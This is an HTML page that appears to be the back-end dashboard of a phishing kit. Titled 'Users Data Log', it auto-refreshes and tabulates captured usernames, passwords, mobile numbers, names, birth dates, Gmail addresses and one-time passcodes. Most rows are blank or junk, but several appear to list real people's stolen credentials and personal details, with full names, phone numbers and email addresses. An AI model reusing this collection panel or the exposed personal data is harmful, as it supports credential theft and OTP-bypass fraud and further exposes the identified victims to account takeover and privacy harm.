
<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.2/css/bootstrap.css">
  <link rel="stylesheet" href="https://cdn.datatables.net/1.11.5/css/dataTables.bootstrap4.min.css">
  <link rel="stylesheet" href="https://cdn.datatables.net/fixedheader/3.2.2/css/fixedHeader.bootstrap4.min.css">
  
  


</head>
<body style="padding:20px;" onload = "JavaScript:AutoRefresh(5000);">

<div class="container" style="padding:20px;background-image: url('x.jpeg'); background-repeat: no-repeat; background-size:center;color:white;">
  <h2>Users Data Log</h2>
                                                                                   
  <div class="table-responsive">          
  <table  id="example" class="table table-striped table-bordered" style="color:white;">
    <thead>
      <tr>
        <th>#</th>
        <th>Username</th>
        <th>Password</th>
        <th>Mobile Number</th>
        <th>Customer Name</th>
        <th>Customer Father Name</th>
        <th>Gmail-ID</th>
        <th>First OTP</th>
        <th>Second OTP</th>
      </tr>
    </thead>
    <tbody>
              <tr>
        <td>1</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>2</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td>Xxxxcccvvg</td>
        <td></td>
        <td></td>
        <td>Rajababu090</td>
      </tr>
            <tr>
        <td>3</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>4</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>5</td>
        <td>SHhshsj</td>
        <td>nsnsns</td>
        <td>nnsnsn</td>
        <td></td>
        <td>sbsbsnns</td>
        <td></td>
        <td>BZbzbzb</td>
        <td>BZbzbzb</td>
      </tr>
            <tr>
        <td>6</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>7</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>8</td>
        <td>1</td>
        <td>2</td>
        <td>3</td>
        <td></td>
        <td>7</td>
        <td></td>
        <td>5</td>
        <td>8</td>
      </tr>
            <tr>
        <td>9</td>
        <td></td>
        <td></td>
        <td></td>
        <td>2</td>
        <td></td>
        <td></td>
        <td>1</td>
        <td></td>
      </tr>
            <tr>
        <td>10</td>
        <td>NXnxjx</td>
        <td>hsjsjsj</td>
        <td>Hsjsjs</td>
        <td></td>
        <td>Drrtt</td>
        <td></td>
        <td></td>
        <td>Rrrrr</td>
      </tr>
            <tr>
        <td>11</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td>12</td>
      </tr>
            <tr>
        <td>12</td>
        <td>djd413342</td>
        <td>yyyy</td>
        <td>uuuuu</td>
        <td></td>
        <td></td>
        <td></td>
        <td>djd413342</td>
        <td></td>
      </tr>
            <tr>
        <td>13</td>
        <td>SanjaykujJZ</td>
        <td>kumar226727</td>
        <td>Jddjnsnen</td>
        <td>Sanjay</td>
        <td>05051980</td>
        <td></td>
        <td>00∅9990</td>
        <td>56466544</td>
      </tr>
            <tr>
        <td>14</td>
        <td>HShsbdb</td>
        <td>bsbsbsb</td>
        <td>ZNnsnxn</td>
        <td>Suraj</td>
        <td>RAHUL1985</td>
        <td></td>
        <td>Rad</td>
        <td>7272737</td>
      </tr>
            <tr>
        <td>15</td>
        <td>BSbsbsb</td>
        <td>bsbsb</td>
        <td>bsbsbzb</td>
        <td>BSbsbs</td>
        <td>bsbsbsbbs</td>
        <td></td>
        <td>99999999</td>
        <td>Rrr</td>
      </tr>
            <tr>
        <td>16</td>
        <td>RAHUL1985</td>
        <td>snsndn</td>
        <td>HSjsjd</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>17</td>
        <td>Gabhshs</td>
        <td>gagahhsh</td>
        <td>hshs</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>18</td>
        <td>SNbsbs</td>
        <td>haban</td>
        <td>nnsnns</td>
        <td>BZbzbzb</td>
        <td>nsnsn</td>
        <td></td>
        <td>BZbsbs</td>
        <td>ZBbzbsbbsn</td>
      </tr>
            <tr>
        <td>19</td>
        <td>Dfff</td>
        <td>dff</td>
        <td>Dff</td>
        <td></td>
        <td></td>
        <td></td>
        <td>Sddfd</td>
        <td></td>
      </tr>
            <tr>
        <td>20</td>
        <td>SBbsj</td>
        <td>nsnsnjsj</td>
        <td>bsnsn</td>
        <td></td>
        <td></td>
        <td></td>
        <td>BShsbdb</td>
        <td></td>
      </tr>
            <tr>
        <td>21</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>22</td>
        <td>Bsbshb</td>
        <td>bbsbb</td>
        <td>bsbsb</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>23</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>24</td>
        <td>djd413342</td>
        <td></td>
        <td>9555</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>25</td>
        <td>djd413342</td>
        <td>shsjjsjj</td>
        <td>9555</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>26</td>
        <td>JDjdj</td>
        <td>ududud</td>
        <td>XHdh</td>
        <td>Ndnd</td>
        <td>RAHUL1985</td>
        <td>Hdhdh</td>
        <td>Jjdjdjd</td>
        <td>Yudusud</td>
      </tr>
            <tr>
        <td>27</td>
        <td>Jay</td>
        <td>jay</td>
        <td>9555</td>
        <td>Hd</td>
        <td>Gxd</td>
        <td>tt</td>
        <td>Gfg</td>
        <td></td>
      </tr>
            <tr>
        <td>28</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>29</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>30</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>31</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>32</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>33</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>34</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>35</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>36</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>37</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>38</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>39</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>40</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>41</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>42</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>43</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>44</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>45</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>46</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>47</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>48</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>49</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>50</td>
        <td>1334666</td>
        <td>ghhhdd</td>
        <td>678776558</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>51</td>
        <td>Jai</td>
        <td>dfggf</td>
        <td>656665565</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>52</td>
        <td>Fuck off</td>
        <td>fuck off</td>
        <td>Fuck you</td>
        <td>Fuckoff</td>
        <td>Fuckoff</td>
        <td>Fuck off</td>
        <td>Fuck off</td>
        <td>000000</td>
      </tr>
            <tr>
        <td>53</td>
        <td>7799227466</td>
        <td>S7799227466a</td>
        <td>7799227466</td>
        <td>Mohammed Sami</td>
        <td>05/05/1991</td>
        <td>sammu4u1143@gmail.com</td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>54</td>
        <td>7799227466</td>
        <td>S7799227466a</td>
        <td>7799227466</td>
        <td>Mohd sami ullah</td>
        <td>05/05/1991</td>
        <td>sammu4u1143@gmail.com</td>
        <td>123456</td>
        <td></td>
      </tr>
            <tr>
        <td>55</td>
        <td>33356051</td>
        <td>R@ja1964</td>
        <td>7674866022</td>
        <td>Naresh Kumar Javvaji</td>
        <td>12-03-1984</td>
        <td>nkumar.1985@gmail.com</td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>56</td>
        <td>Sri</td>
        <td>ram</td>
        <td>8969580749</td>
        <td>Kunti</td>
        <td>09/07/1998</td>
        <td>Habsb@gmail.com</td>
        <td>896539</td>
        <td>337822</td>
      </tr>
            <tr>
        <td>57</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>58</td>
        <td>1219524</td>
        <td>rahul@1999</td>
        <td>9820224501</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>59</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>60</td>
        <td>588868888</td>
        <td>123</td>
        <td>Hfvvv</td>
        <td>Hfgvv</td>
        <td>Jbvvb</td>
        <td>Nhbbb</td>
        <td>675755</td>
        <td></td>
      </tr>
            <tr>
        <td>61</td>
        <td>Hhhhhh</td>
        <td>12344454</td>
        <td>868585888</td>
        <td>Rsjdhdd</td>
        <td>051919955</td>
        <td>Fvvvxc</td>
        <td>575255</td>
        <td></td>
      </tr>
            <tr>
        <td>62</td>
        <td>23274000</td>
        <td>2455</td>
        <td>8054682767</td>
        <td>SURJIT SINGH</td>
        <td>01051961</td>
        <td>sidhujb405@gmail.com</td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>63</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td>456666</td>
        <td></td>
      </tr>
            <tr>
        <td>64</td>
        <td>p</td>
        <td>p</td>
        <td>3</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>65</td>
        <td>hrlo</td>
        <td>hi</td>
        <td>78956443</td>
        <td>zahhdi</td>
        <td>124555</td>
        <td>fghhh@gnail.com</td>
        <td>otp1</td>
        <td></td>
      </tr>
            <tr>
        <td>66</td>
        <td>1</td>
        <td>2</td>
        <td>3</td>
        <td>4</td>
        <td>5</td>
        <td>8</td>
        <td>90</td>
        <td>91</td>
      </tr>
            <tr>
        <td>67</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td>otp2</td>
      </tr>
            <tr>
        <td>68</td>
        <td>Test1</td>
        <td>Test1</td>
        <td>9865325698</td>
        <td>Test1cn</td>
        <td>Test1cfn</td>
        <td>Test1</td>
        <td>234567</td>
        <td></td>
      </tr>
            <tr>
        <td>69</td>
        <td>12</td>
        <td>23</td>
        <td>14</td>
        <td>15</td>
        <td>26</td>
        <td>18</td>
        <td>otp1</td>
        <td></td>
      </tr>
            <tr>
        <td>70</td>
        <td>bipinpatel0605@gmail.com</td>
        <td>2340</td>
        <td>9574869484</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>71</td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
        <td></td>
      </tr>
            <tr>
        <td>72</td>
        <td>45</td>
        <td>566</td>
        <td>6778</td>
        <td>66777</td>
        <td> tyyyy</td>
        <td> vgggggg</td>
        <td>otp</td>
        <td></td>
      </tr>
          </tbody>
  </table>
  </div>
</div>
<script type = "text/JavaScript">
         <!--
            function AutoRefresh( t ) {
               setTimeout("location.reload(true);", t);
            }
         //-->
      </script>
<script>
    $(document).ready(function() {
    var table = $('#example').DataTable( {
        fixedHeader: true
    } );
} );
</script>
<script src="https://code.jquery.com/jquery-3.5.1.js"></script>
<script src="https://cdn.datatables.net/1.11.5/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.11.5/js/dataTables.bootstrap4.min.js"></script>
<script src="https://cdn.datatables.net/fixedheader/3.2.2/js/dataTables.fixedHeader.min.js"></script>




<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine and condemn war. Push Russian government to act against war. Be brave, vocal and show your support to Ukraine. Follow the latest news <a title="https://www.bbc.com/news/live/world-europe-60517447" target="_blank" href="https://www.bbc.com/news/live/world-europe-60517447" style="color: black;"><b>HERE</b></a></div></body>
</html>
